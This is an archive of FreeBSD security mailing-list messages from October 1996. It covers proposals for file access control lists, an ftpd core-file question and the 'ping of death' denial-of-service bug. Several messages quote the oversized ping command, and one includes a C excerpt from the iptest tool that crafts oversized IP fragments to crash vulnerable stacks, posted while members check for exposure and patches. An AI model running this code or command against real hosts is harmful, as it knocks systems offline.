From owner-freebsd-security Sun Oct 20 10:14:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA02232 for security-outgoing; Sun, 20 Oct 1996 10:14:46 -0700 (PDT) Received: from obie.softweyr.com (slc115.modem.xmission.com [204.228.136.115]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA02225 for ; Sun, 20 Oct 1996 10:14:42 -0700 (PDT) Received: (from wes@localhost) by obie.softweyr.com (8.7.5/8.6.12) id LAA04095; Sun, 20 Oct 1996 11:16:12 -0600 (MDT) Date: Sun, 20 Oct 1996 11:16:12 -0600 (MDT) Message-Id: <199610201716.LAA04095@obie.softweyr.com> From: Wes Peters To: Jerry Kelley CC: security@freebsd.org Subject: Any FreeBSD security topics of interest? In-Reply-To: <326902B1.F1A@iquest.net> References: <326902B1.F1A@iquest.net> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jerry Kelley writes: > Again, my goal is a new topic or improvement to security for UNIX that > could be implemented (and added) to FreeBSD. I'd like to give something > back to the FreeBSD community because I believe strongly in the > principles of the a freely available OS. I'm sure there are others more deeply embedded in the security woes of {Free,Net,Open}BSD who can answer in more detail, but one topic immediately springs to mind: extend the ufs file system to use per-file access control lists. If you're not familiar with ACLs, get your hands on an HP-UX system and try 'man acl'. Their ACL system is workable and relatively UNIX-ish. ACLs have a lot of potential for clearing up some sticky administration problems in UNIX. Many of the setuid programs we worry about could be more carefully restricted with carefully applied ACLs, and many of the tasks that you have to 'su' to do today could be ACL'ed and setuid so that specific groups or individuals could perform them without needing to su. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.xmission.com/~softweyr softweyr@xmission.com From owner-freebsd-security Sun Oct 20 19:51:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA14628 for security-outgoing; Sun, 20 Oct 1996 19:51:36 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA14610 for ; Sun, 20 Oct 1996 19:51:26 -0700 (PDT) Received: from crunch.io.org (crunch.io.org [198.133.36.156]) by post.io.org (8.7.5/8.7.3) with SMTP id WAA09447; Sun, 20 Oct 1996 22:51:13 -0400 (EDT) Date: Sun, 20 Oct 1996 22:51:12 -0400 (EDT) From: Brian Tao To: David Greenman cc: Ollivier Robert , freebsd-security@freebsd.org Subject: Re: bin/1805: Bug in ftpd In-Reply-To: <199610151911.MAA02970@root.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 15 Oct 1996, David Greenman wrote: > > Unfortunately, this isn't true for anonymous ftp which runs as root. Doesn't an anon ftp connection open the chrooted /etc/spwd.db though (e.g., /var/spool/ftp/etc/spwd.db, here)? -- Brian Tao (BT300, taob@io.org, taob@ican.net) Senior Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Sun Oct 20 23:17:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA26606 for security-outgoing; Sun, 20 Oct 1996 23:17:47 -0700 (PDT) Received: from root.com (implode.root.com [198.145.90.17]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA26601 for ; Sun, 20 Oct 1996 23:17:44 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by root.com (8.7.6/8.6.5) with SMTP id XAA21376; Sun, 20 Oct 1996 23:18:11 -0700 (PDT) Message-Id: <199610210618.XAA21376@root.com> X-Authentication-Warning: implode.root.com: Host localhost [127.0.0.1] didn't use HELO protocol To: Brian Tao cc: Ollivier Robert , freebsd-security@freebsd.org Subject: Re: bin/1805: Bug in ftpd In-reply-to: Your message of "Sun, 20 Oct 1996 22:51:12 EDT." From: David Greenman Reply-To: dg@root.com Date: Sun, 20 Oct 1996 23:18:11 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >On Tue, 15 Oct 1996, David Greenman wrote: >> >> Unfortunately, this isn't true for anonymous ftp which runs as root. > > Doesn't an anon ftp connection open the chrooted /etc/spwd.db >though (e.g., /var/spool/ftp/etc/spwd.db, here)? Hmmm. I think it still opens the normal one first in order to verify the existence of the "ftp" user. In any case, I don't think this is an issue because the core file is created with uid 0 and 0600 permissions...and ftpd accesses files as user ftp when running as anonymous. So in other words, even if it did create a core file, the anonymous user wouldn't be able to read it. -DG David Greenman Core-team/Principal Architect, The FreeBSD Project From owner-freebsd-security Mon Oct 21 14:10:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA12257 for security-outgoing; Mon, 21 Oct 1996 14:10:07 -0700 (PDT) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id OAA12211 for ; Mon, 21 Oct 1996 14:09:59 -0700 (PDT) Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id OAA00219; Mon, 21 Oct 1996 14:09:47 -0700 Date: Mon, 21 Oct 1996 14:09:43 -0700 (PDT) From: Steve Reid To: security@freebsd.org Subject: [bugtraq] Serious Linux Security Bug Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This has been discussed on the Bugtraq list for a few days now, but I haven't seen any talk of it here. There is no mention of the attack working against *BSD machines except for one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress card stopped working for a couple of minutes. The attack is simple. From a Win95 box, ping -l 65510 buggyhost and it can crash or reboot some OSs. Very nasty. Has anyone checked the FreeBSD kernel to make sure that we're not vulnerable? ---------- Forwarded message ---------- Date: Mon, 21 Oct 1996 09:26:04 +0100 From: Alan Cox To: Multiple recipients of list BUGTRAQ Subject: Re: Urgent !! Serious Linux Security Bug.... > >On the Linux machine, you need to be running kernel version 2.0.7(It's > >the > >lowest we run) up to version 2.0.20(The highest we're running). > > Actually, I'm running 2.1.1 and it works on that as well... It seems to work rather nicely on Digital Unix (some revisions), AIX, Linux 2.0.x and Linux 2.1.x - has anyone tried it on NT ? Ironically its a well known problem that is tested by the ip_send tool. It just happened that the test tool I used didnt construct a packet with a useful IP protocol field and it thus never hit the layer of code that can't handle forged big packets. As well as the patch quoted there is a slightly newer revision that also happens to log who tried to blow up your computer. Alan From owner-freebsd-security Mon Oct 21 14:36:30 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA14708 for security-outgoing; Mon, 21 Oct 1996 14:36:30 -0700 (PDT) Received: from critter.tfs.com (disn6.cybercity.dk [194.16.57.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA14685; Mon, 21 Oct 1996 14:36:17 -0700 (PDT) Received: from critter.tfs.com (localhost.tfs.com [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id XAA03977; Mon, 21 Oct 1996 23:35:35 +0200 (MET DST) To: Steve Reid cc: security@freebsd.org Subject: Re: [bugtraq] Serious Linux Security Bug In-reply-to: Your message of "Mon, 21 Oct 1996 14:09:43 PDT." Date: Mon, 21 Oct 1996 23:35:34 +0200 Message-ID: <3975.845933734@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message , Steve >There is no mention of the attack working against *BSD machines except for >one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress >card stopped working for a couple of minutes. my card does that all the time. The ix cards suck and consequently nobody loved the driver. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Oct 21 14:58:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA16198 for security-outgoing; Mon, 21 Oct 1996 14:58:35 -0700 (PDT) Received: from glacier.cold.org (glacier.cold.org [206.81.134.54]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA16188 for ; Mon, 21 Oct 1996 14:58:26 -0700 (PDT) Received: from localhost (brandon@localhost) by glacier.cold.org (8.7.5/8.7.3) with SMTP id QAA00169; Mon, 21 Oct 1996 16:00:20 -0600 (MDT) Date: Mon, 21 Oct 1996 16:00:20 -0600 (MDT) From: Brandon Gillespie To: Steve Reid cc: security@freebsd.org Subject: Re: [bugtraq] Serious Linux Security Bug In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 21 Oct 1996, Steve Reid wrote: > This has been discussed on the Bugtraq list for a few days now, but I > haven't seen any talk of it here. > > There is no mention of the attack working against *BSD machines except for > one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress > card stopped working for a couple of minutes. > > The attack is simple. From a Win95 box, > ping -l 65510 buggyhost > and it can crash or reboot some OSs. Very nasty. > > Has anyone checked the FreeBSD kernel to make sure that we're not > vulnerable? I just tried this (from w95) against a FreeBSD 2.1.5 box and a 2.1.0 box, both had no problems. Of course, I'm not sure if the ping ran correctly, it returned: Request timed out. Instead. It does work without the '-l 65510' args. -Brandon From owner-freebsd-security Mon Oct 21 15:44:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA19373 for security-outgoing; Mon, 21 Oct 1996 15:44:48 -0700 (PDT) Received: from circle.net (demeter.circle.net [207.79.160.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA19365 for ; Mon, 21 Oct 1996 15:44:41 -0700 (PDT) Received: (from troy@localhost) by circle.net (8.7.5/8.7.3) id SAA18513; Mon, 21 Oct 1996 18:43:08 -0400 (EDT) Date: Mon, 21 Oct 1996 18:43:08 -0400 (EDT) From: Troy Arie Cobb To: security@FreeBSD.org Subject: Re: [bugtraq] Serious Linux Security Bug In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 21 Oct 1996, Brandon Gillespie wrote: > Date: Mon, 21 Oct 1996 16:00:20 -0600 (MDT) > From: Brandon Gillespie > To: Steve Reid > Cc: security@FreeBSD.org > Subject: Re: [bugtraq] Serious Linux Security Bug > > On Mon, 21 Oct 1996, Steve Reid wrote: > > This has been discussed on the Bugtraq list for a few days now, but I > > haven't seen any talk of it here. > > > > There is no mention of the attack working against *BSD machines except for > > one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress > > card stopped working for a couple of minutes. > > > > The attack is simple. From a Win95 box, > > ping -l 65510 buggyhost > > and it can crash or reboot some OSs. Very nasty. > > > > Has anyone checked the FreeBSD kernel to make sure that we're not > > vulnerable? > > I just tried this (from w95) against a FreeBSD 2.1.5 box and a 2.1.0 box, > both had no problems. Of course, I'm not sure if the ping ran correctly, > it returned: > > Request timed out. > > Instead. It does work without the '-l 65510' args. Ditto. But watching on the FBsd box when it happened I noticed that most of the network MBUFS filled up, caused the machine to stutter for a brief seccond and then flushed it. I'd guess that it triggers a fringe condition in the somewhat poor networking code in Linux. Ugly. Glad to be on FreeBSD, - troy Troy Arie Cobb troy@circle.net ------------------------------------------------------ | Circle Net, Inc. | global internet access | | http://www.circle.net | for western north carolina | | info@circle.net | and beyond... | | 704-254-9500 | | ------------------------------------------------------ From owner-freebsd-security Mon Oct 21 18:44:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA02436 for security-outgoing; Mon, 21 Oct 1996 18:44:44 -0700 (PDT) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA02427 for ; Mon, 21 Oct 1996 18:44:40 -0700 (PDT) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.2/8.6.10) with ESMTP id SAA00894; Mon, 21 Oct 1996 18:44:21 -0700 (PDT) Message-Id: <199610220144.SAA00894@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: Wes Peters cc: Jerry Kelley , security@FreeBSD.ORG Subject: Re: Any FreeBSD security topics of interest? In-reply-to: Your message of "Sun, 20 Oct 1996 11:16:12 MDT." <199610201716.LAA04095@obie.softweyr.com> Date: Mon, 21 Oct 1996 18:44:16 -0700 From: Cy Schubert Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Jerry Kelley writes: [...] > > ACLs have a lot of potential for clearing up some sticky > administration problems in UNIX. Many of the setuid programs we worry > about could be more carefully restricted with carefully applied ACLs, > and many of the tasks that you have to 'su' to do today could be > ACL'ed and setuid so that specific groups or individuals could perform > them without needing to su. I and my team have been using ACL's on the Solaris 2.5 and 2.5.1 boxes for quite some time. They've been lifesavers. We've been able to delegate management of the SNA software on one of the Solaris boxes we manage to the DB2 DBA team using a combination of ACL's and sudo. This would be handy addition to FreeBSD as well. Solaris uses two comma nds to manage ACL's, setfacl and getfacl. The ls -l listing has also changed to add a + to the permissions to indicate that ACL's are in use, e.g., -rw-r--r--+ 1 root other 137 Oct 11 11:18 foo If we do a getfacl foo we get, # file: foo # owner: root # group: other user::rw- group::r-- #effective:r-- group:sna:rw- #effective:rw- mask:rwx other:r-- This in turn can be used as input on a setfacl command, e.g., getfacl foo | setfacl -f - foobar Regards, Phone: (250)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Mon Oct 21 22:37:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA21709 for security-outgoing; Mon, 21 Oct 1996 22:37:46 -0700 (PDT) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id WAA21689 for ; Mon, 21 Oct 1996 22:37:44 -0700 (PDT) Received: (from obrien@localhost) by relay.nuxi.com (8.7.5/8.6.12) id WAA06158; Mon, 21 Oct 1996 22:37:56 -0700 (PDT) Message-Id: <199610220537.WAA06158@relay.nuxi.com> Date: Mon, 21 Oct 1996 22:37:55 -0700 From: obrien@NUXI.cs.ucdavis.edu (David E. O'Brien) To: brandon@glacier.cold.org (Brandon Gillespie) Cc: steve@edmweb.com (Steve Reid), security@FreeBSD.ORG Subject: Re: [bugtraq] Serious Linux Security Bug References: X-Mailer: Mutt 0.48.1-PL0 Mime-Version: 1.0 X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 In-Reply-To: ; from Brandon Gillespie on Oct 21, 1996 16:00:20 -0600 Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Brandon Gillespie writes: > I just tried this (from w95) against a FreeBSD 2.1.5 box and a 2.1.0 box, > both had no problems. Of course, I'm not sure if the ping ran correctly, > it returned: > > Request timed out. This is the same output you get when you *do* kill a host. The only way to see if this was "effective" is to watch the console of the host. -- -- David (obrien@cs.ucdavis.edu) From owner-freebsd-security Mon Oct 21 23:03:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA24300 for security-outgoing; Mon, 21 Oct 1996 23:03:53 -0700 (PDT) Received: from arrakis.cs.put.poznan.pl (root@arrakis.cs.put.poznan.pl [150.254.33.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA24292 for ; Mon, 21 Oct 1996 23:03:49 -0700 (PDT) Received: (from piesik@localhost) by arrakis.cs.put.poznan.pl (8.7.5/8.7.3) id IAA19921; Tue, 22 Oct 1996 08:03:43 +0200 (MET DST) Date: Tue, 22 Oct 1996 08:03:43 +0200 (MET DST) From: Piotr Piesik Message-Id: <199610220603.IAA19921@arrakis.cs.put.poznan.pl> To: security@freebsd.org, steve@edmweb.com Subject: Re: [bugtraq] Serious Linux Security Bug Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > There is no mention of the attack working against *BSD machines except for > one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress > card stopped working for a couple of minutes. My 3Com 3c509 on 2.1.0 stops for a couple of seconds. Win95 reports timeout. Piotr --------------------------------------------------------------- Piotr Piesik, MSc, NetWare & Unix system administrator Institute of Computing Science, Poznan University of Technology ul. Piotrowo 3A, 60-965 Poznan, Poland office: tel: +4861 782557 fax: +4861 771525 home: tel/fax +4861 750231 --------------------------------------------------------------- .->-. `-<-' Transmitted on 100% recycled electrons From owner-freebsd-security Tue Oct 22 04:14:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA22916 for security-outgoing; Tue, 22 Oct 1996 04:14:20 -0700 (PDT) Received: from smokey.systemics.com (smokey.systemics.com [193.67.124.65]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA22894 for ; Tue, 22 Oct 1996 04:14:14 -0700 (PDT) Received: from kampai.systemics.com (3U88WtZNTe9IQI/9w/r7zPFuXpoBobtj@internal-mail.systemics.com [193.67.124.74]) by smokey.systemics.com (8.6.12/8.6.12) with SMTP id NAA18739; Tue, 22 Oct 1996 13:14:11 +0200 Message-ID: <326CAC94.5358CBEE@systemics.com> Date: Tue, 22 Oct 1996 13:14:28 +0200 From: Gary Howland Organization: Systemics Ltd. X-Mailer: Mozilla 3.0 (X11; I; FreeBSD 2.2-960501-SNAP i386) MIME-Version: 1.0 To: Steve Reid CC: security@freebsd.org Subject: Re: [bugtraq] Serious Linux Security Bug References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Steve Reid wrote: > > This has been discussed on the Bugtraq list for a few days now, but I > haven't seen any talk of it here. > > There is no mention of the attack working against *BSD machines except for > one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress > card stopped working for a couple of minutes. > > The attack is simple. From a Win95 box, > ping -l 65510 buggyhost > and it can crash or reboot some OSs. Very nasty. > > Has anyone checked the FreeBSD kernel to make sure that we're not > vulnerable? I've tried it on 2.1 and 2.2 and they behave OK (although they don't reply to the ping, unlike a windoze machine). I was trying to emulate the problem with a small perl script, but haven't got a suitable "target". Anyone out there care to test it for me? Best regards, Gary -- pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From owner-freebsd-security Tue Oct 22 05:50:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA26731 for security-outgoing; Tue, 22 Oct 1996 05:50:47 -0700 (PDT) Received: from colin.muc.de (root@colin.muc.de [193.174.4.1]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA26715 for ; Tue, 22 Oct 1996 05:50:29 -0700 (PDT) Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <86020-1>; Tue, 22 Oct 1996 14:34:49 +0200 Received: from [192.168.42.51] (aleisha.tavari.muc.de [192.168.42.51]) by tavari.muc.de (8.7.5/8.7.3) with ESMTP id NAA00287; Tue, 22 Oct 1996 13:07:20 +0200 (MET DST) X-Sender: lutz@mail Message-Id: In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Tue, 22 Oct 1996 13:15:53 +0200 To: Steve Reid From: Lutz Albers Subject: Re: [bugtraq] Serious Linux Security Bug Cc: security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Steve Reid wrote on 21.10.1996 [bugtraq] Serious Linux Security Bug >There is no mention of the attack working against *BSD machines except for >one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress >card stopped working for a couple of minutes. > >The attack is simple. From a Win95 box, >ping -l 65510 buggyhost >and it can crash or reboot some OSs. Very nasty. > >Has anyone checked the FreeBSD kernel to make sure that we're not >vulnerable? Just tried it from one 2.1.5R machine to another (source using a 3COM509 (ep0), target using a SMC Elite 16C (ed0)) with no problems. It did take some time for the source machine preparing the ICMP request (machine crawls with all caches disabled :-( lutz --------------------------------------------------------------------- Lutz Albers | What's good ? Luederitzstr. 14, 81929-Muenchen, Germany | Life's good - ph: +49-89-93940363 | But not fair at all fax:+49-89-93940365 | (Lou Reed) Do not take life too seriously, you will never get out of it alive. From owner-freebsd-security Tue Oct 22 06:38:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA28830 for security-outgoing; Tue, 22 Oct 1996 06:38:07 -0700 (PDT) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA28820 for ; Tue, 22 Oct 1996 06:38:01 -0700 (PDT) Message-Id: <199610221338.GAA28820@freefall.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA045211312; Tue, 22 Oct 1996 23:35:12 +1000 From: Darren Reed Subject: Re: [bugtraq] Serious Linux Security Bug To: lutz@muc.de (Lutz Albers) Date: Tue, 22 Oct 1996 23:35:12 +1000 (EST) Cc: security@freebsd.org In-Reply-To: from "Lutz Albers" at Oct 22, 96 01:15:53 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Solaris2 was, I believe, vulnerable to this bug too. >From the "Crashable" file for iptest: Solaris 2.4 - upto and including 101945-34, > 34 ? Solaris 2.5 - 11/95 For those with it handly, "iptest -1 -p 8". but I built in some random lossage which may stop it triggering the bug. I think if the lossage is taken out, some systems will try to reassemble it all into a buffer which (of course), is at max. 64k in size. However, it doesn't try to send an ICMP packet, the following segment of code is what triggeres it: if (!ptest || (ptest == 8)) { struct timeval tv; gettimeofday(&tv, NULL); srand(tv.tv_sec ^ getpid() ^ tv.tv_usec); /* * Part8: 63k packet + 1k fragment at offset 0x1ffe */ ip->ip_off = IP_MF; u->uh_dport = htons(9); ip->ip_id = htons(id++); printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n"); ip->ip_len = 768 + 20 + 8; if ((rand() & 0x1f) != 0) { (void) send_ip(nfd, mtu, ip, gwip, 1); printf("%d\r", i); } else printf("skip 0\n"); ip->ip_len = MIN(768 + 20, mtu - 68); i = 512; for (; i < (63 * 1024 + 768); i += 768) { ip->ip_off = IP_MF | (i >> 3); ip->ip_off = IP_MF | (i >> 3); if ((rand() & 0x1f) != 0) { (void) send_ip(nfd, mtu, ip, gwip, 1); printf("%d\r", i); } else printf("skip %d\n", i); fflush(stdout); PAUSE(); } ip->ip_len = 896 + 20; ip->ip_off = IP_MF | (i >> 3); if ((rand() & 0x1f) != 0) { (void) send_ip(nfd, mtu, ip, gwip, 1); printf("%d\r", i); } else printf("skip %d\n", i); fflush(stdout); PAUSE(); } ip->ip_len = 896 + 20; ip->ip_off = IP_MF | (i >> 3); if ((rand() & 0x1f) != 0) { (void) send_ip(nfd, mtu, ip, gwip, 1); printf("%d\r", i); } else printf("skip\n"); putchar('\n'); fflush(stdout); } Don't work against any system using a BSD based IP networking code. Darren From owner-freebsd-security Tue Oct 22 07:16:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA01770 for security-outgoing; Tue, 22 Oct 1996 07:16:27 -0700 (PDT) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA01764 for ; Tue, 22 Oct 1996 07:16:22 -0700 (PDT) Received: by halloran-eldar.lcs.mit.edu; (5.65v3.2/1.1.8.2/19Aug95-0530PM) id AA23679; Tue, 22 Oct 1996 10:16:11 -0400 Date: Tue, 22 Oct 1996 10:16:11 -0400 From: Garrett Wollman Message-Id: <9610221416.AA23679@halloran-eldar.lcs.mit.edu> To: cschuber@uumail.gov.bc.ca Cc: security@FreeBSD.ORG Subject: Re: Any FreeBSD security topics of interest? In-Reply-To: <199610220144.SAA00894@cwsys.cwent.com> References: <199610201716.LAA04095@obie.softweyr.com> <199610220144.SAA00894@cwsys.cwent.com> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < said: > Solaris uses two comma > nds to manage ACL's, setfacl and getfacl. The > ls -l listing has also changed to add a + to the permissions to > indicate that ACL's are in use, e.g., > -rw-r--r--+ 1 root other 137 Oct 11 11:18 foo I have to say that I have always preferred AFS's per-directory ACL semantics to the more commonly implemented per-file ACLs. AFS does not use the group and other permission bits at all, but applies the user bits as a mask against certain rights given by the ACL. The permission bits in AFS ACLs are `rwidlka', for `read', `write', `insert', `delete', `lookup', `lock', and `administer' (i.e., change the ACL). This enables certain nice features such as authenticated local mail delivery (make a directory with permissions `System:AnyUser lik' and they can create new mail files in that directory but cannot read, write, or delete existing ones; the owner of the file is the authenticated sender). -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, ANA, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Tue Oct 22 18:29:33 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA20992 for security-outgoing; Tue, 22 Oct 1996 18:29:33 -0700 (PDT) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA20984 for ; Tue, 22 Oct 1996 18:29:29 -0700 (PDT) Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id SAA00424; Tue, 22 Oct 1996 18:29:24 -0700 Date: Tue, 22 Oct 1996 18:29:21 -0700 (PDT) From: Steve Reid To: security@freebsd.org Subject: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Another from Bugtraq. Can anyone confirm or deny the last paragraph? For anyone who's interested, Bugtraq is archived at http://geek-girl.com/bugtraq/ ---------- Forwarded message ---------- Date: Wed, 23 Oct 1996 07:45:57 +1000 From: Darren Reed To: Multiple recipients of list BUGTRAQ Subject: Re: Suspicion about denial of service attacks possible on IP. In some mail from Henrik P Johnson, sie said: > > I was idly reading through Internetworking with TCP/IP yesterday when it hit me > what might be a possible denial of service attack on IP stacks. What would > happen if a host was bombarded with faked fragments of large IP packages. Would > the stack allocate more and more memory trying to reconstruct the packages or > do they operate with a fixed/max size limit on memory allocated for IP > defragmentation? It is possible, but it requires a lot of packets. Different boxes handle it differently too. When I tried it against my SunOS4 box, it didn't crash, but X-Windows could not be used after it ran out of mbufs. There's a bug in how overlapping mbufs are freed in BSD code upto 4.4BSD-Lite/2 (I believe) - that or it never got merged with FreeBSD 2.1.5. (Patch for this is included with IP Filter ;) For FreeBSD, it seems that the result is that it never frees the mbuf... Darren From owner-freebsd-security Tue Oct 22 18:59:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA22143 for security-outgoing; Tue, 22 Oct 1996 18:59:35 -0700 (PDT) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA22136 for ; Tue, 22 Oct 1996 18:59:32 -0700 (PDT) Message-Id: <199610230159.SAA22136@freefall.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA242845960; Wed, 23 Oct 1996 11:59:20 +1000 From: Darren Reed Subject: Re: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd) To: steve@edmweb.com (Steve Reid) Date: Wed, 23 Oct 1996 11:59:20 +1000 (EST) Cc: security@freebsd.org In-Reply-To: from "Steve Reid" at Oct 22, 96 06:29:21 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In some mail from Steve Reid, sie said: > > Another from Bugtraq. Can anyone confirm or deny the last paragraph? > I posted the patch recently and it was picked up and committed by one of the FreeBSD team. I don't know what branch that went into, however... From owner-freebsd-security Tue Oct 22 19:28:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA23721 for security-outgoing; Tue, 22 Oct 1996 19:28:29 -0700 (PDT) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA23714 for ; Tue, 22 Oct 1996 19:28:26 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id TAA01479; Tue, 22 Oct 1996 19:28:02 -0700 (PDT) From: Don Lewis Message-Id: <199610230228.TAA01479@salsa.gv.ssi1.com> Date: Tue, 22 Oct 1996 19:28:01 -0700 In-Reply-To: Darren Reed "Re: [more bugtraq] Re: 